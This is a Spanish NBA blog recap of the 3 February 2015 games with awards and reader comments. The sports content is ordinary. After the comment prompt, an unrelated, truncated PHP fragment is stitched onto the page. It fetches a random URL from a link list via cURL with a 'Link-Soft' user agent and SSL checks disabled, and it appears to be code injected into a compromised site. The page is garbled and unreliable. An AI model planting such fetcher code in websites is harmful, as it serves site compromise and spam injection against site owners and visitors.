La Crónica: Lecciones a domicilio

04 de February de 2015 por MagicJohnson32

Los Warriors vuelven a mandar en los standings tras alecionar a los Kings, los Blazers vuelven a ganar ahora que Robin Lopez está sano, los Pistons vuelven a competir con Augustin llenando el vacío dejado por la lesión de Jennings y los Nuggets vuelven a ser un equipo lastimoso.

Vamos con la crónica.

gsw_kings

Golden State Warriors 121 – Sacramento Kings 96

Los Kings necesitan aprender la lección. Lo que hicieron con Mike Malone nos mantiene en la perplejidad, y ésta no deja de aumentar conforme van pasando los partidos y queda cada vez más lejos aquel equipo sorprendente e ilusionante que fueron los Kings del arranque de temporada. Lo fueron hasta el despido de Malone. Y como los Kings necesitan aprender la lección, los Warriors se ofrecieron a ofrecerles una a domicilio. A cargo del Profesor Curry y sus discípulos, nada menos. Tuvieron a bien incluso dar ventaja a los locales, que se vieron +10 (20-10) antes de que arreciase esa tormenta de juego total que con frecuencia es Golden State: un parcial de 27-2, durante el cual los Kings estuvieron 7 minutos sin anotar, y ya no hubo partido más que para ahondar en las penas de Sacramento, muchas de las cuales autoinflingidas. El triunfo devuelve a los Warriors el mejor balance de la liga en solitario. A ver si los Hawks aguantan el ritmo.

Utah Jazz 102 – Portland Trail Blazers 103

Volvió Robin Lopez, y con él volvieron las victorias para los Blazers. Después de tres derrotas seguidas, los de Oregon saborearon el triunfo el día en que su pívot regresaba de una lesión que le ha impedido disputar los últimos 23 partidos. Ante la visita de unos buenos Jazz, recuperamos la versión más reconocible de los Blazers, con Aldridge, Lillard y Matthews al frente de la faceta anotadora, Batum aportando un poco de todo y Lopez sosteniendo el fuerte en defensa. Los Jazz se mostraron una vez más como un equipo en progresión, corto en cuanto a recursos pero en el que Coach Quinn sabe lo que tiene y sabe cómo usarlo. Anoche llegaron igualados al tramo final pero dos triples seguidos de Matthews rompieron el equilibrio, pese a lo cual no perdieron la cara hasta el bocinazo final. La baja de Robin Lopez, lesionado desde el 15 de diciembre, ha descabalgado a Portland de la carrera por la segunda plaza del Oeste (3,5 partidos les separan de los Grizzlies) pero siguen con todas las posibilidades de hacerse con la tercera posición.

El resto de la jornada

Poquito a poquito parece que los Pistons van recuperándose del shock que les suposo la grave lesión de Brandon Jennings. En DJ Augustin han encontrado al sustituto perfecto y las cosas van volviendo a su cauce sin prisa pero sin pausa. Ayer los de Detroit se impusieron claramente a los Heat y se sitúan a sólo 2 partidos y medio de la ansiada 8ª plaza del Este. Chris Bosh anotó 34 puntos pero nadie más estuvo a la altura ofensivamente en Miami. Tampoco renuncian a esa 8ª plaza los Celtics aunque ellos se encuentran algo más lejos en la clasificación. Ayer se impusieron a unos Knicks que se desinflaron cuando habían conseguido reducir a 4 puntos una diferencia que había llegado a ser de 16. Los que continúan su descenso a los infiernos son los Nuggets, que cayeron ante unos Sixers que ya acumulan tres victorias consecutivas en casa. Los de Brian Shaw solo han ganado 1 de sus últimos 10 partidos.

PREMIOS

MVP: DJ Augustin es el eterno suplente que siempre destaca en cuanto le dan minutos. Ayer le cascó 25 puntos a los Heat y repartió 13 asistencias.

Rookie: Marcus Smart salió de titular con los Celtics. Sus 13 puntos, 4 rebotes, 3 asistencias y 2 robos de ayer son una muestra de lo que está por venir.

Sorpresa: Sólido partido de Jason Smith (12 puntos, 7 rebotes, 5 asistencias) que sigue acumulando minutos ante la bajas de Aldrich y Stoudemire. En los Sixers, la actuación del día le correspondió a Hollis Thompson que acabó el partido con 23 puntos. Y en Golden State, Leandro Barbosa (sí, juega en GS) aprovechó la fácil victoria de su equipo para anotar 12 puntos, repartir 5 asistencias y robar 3 balones.

Decepción: La participación de Kenneth Faried en el partido contra los Sixers estaba en duda pero acabó jugando. Una vez comprobado el resultado, mejor que no lo hubiera hecho: 0 puntos con un 0 de 6 en TC.

Esfuerzo en vano: 26 puntos, 11 rebotes, 4 asistencias, 3 robos, 4 pérdidas… Debe de ser absolutamente frustrante acabar el partido con estos números y no llevarse la victoria. De todas maneras, DeMarcus Cousins tiene que estar ya un poco acostumbrado, aunque eso no es excusa para no mostrar la mínima profesionalidad necesaria en defensa.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. Nacho dice:
    #1

    Lo de Cousins no es ya profesionalidad o no, es para parar el partido y darle unas cuantas hostias. Entrenador, árbitros, compañeros, rivales, espectadores… da igual. Y Adam Silver debería decir hoy mismo que no va al All Star. Y Lillard mientras tanto, a lo suyo. Pfff

      Citar

  2. Nacho dice:
    #2

    Por otro lado, la lucha por puestos de PO en el Este va a ser interesante. De las cosas que no entiendo es lo de los Pacers, tienen equipo de sobra (aún sin George) para estar ahí, han tenido partidos y rachas en las que parecían entrar en la pomada, pero varias rachas con juego deleznable los han hundido, y aún así, si se lo propusieran, llegaban. En Miami sí que hay que hacer una revolución, y pensar que dos tíos de este pseudo equipo van al All Star…
    Ole por Detroit, y si los verdes se enganchan a esa pelea, sería la leche. Porque de los Celtic’s se puede decir de todo, pero el equipo lucha, no tiene mimbres, pero se deja la piel en cada partido.

      Citar

  3. Futurman dice:
    #3

    En sorpresa (aunque ya ha dejado de serlo) Hassan Whiteside sigue con sus números: doble-doble con 5 tapones. Es un chollo que el año que viene le mantengan por menos de un kilo.

      Citar

  4. Ruxixón dice:
    #4

    Agree con Nacho en lo de los Celtics,las salidas de Rondo y Green han unido más a lo que debe ser parte del núcleo del equipo y aunque pierden más que ganan hay otro espíritu allí.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>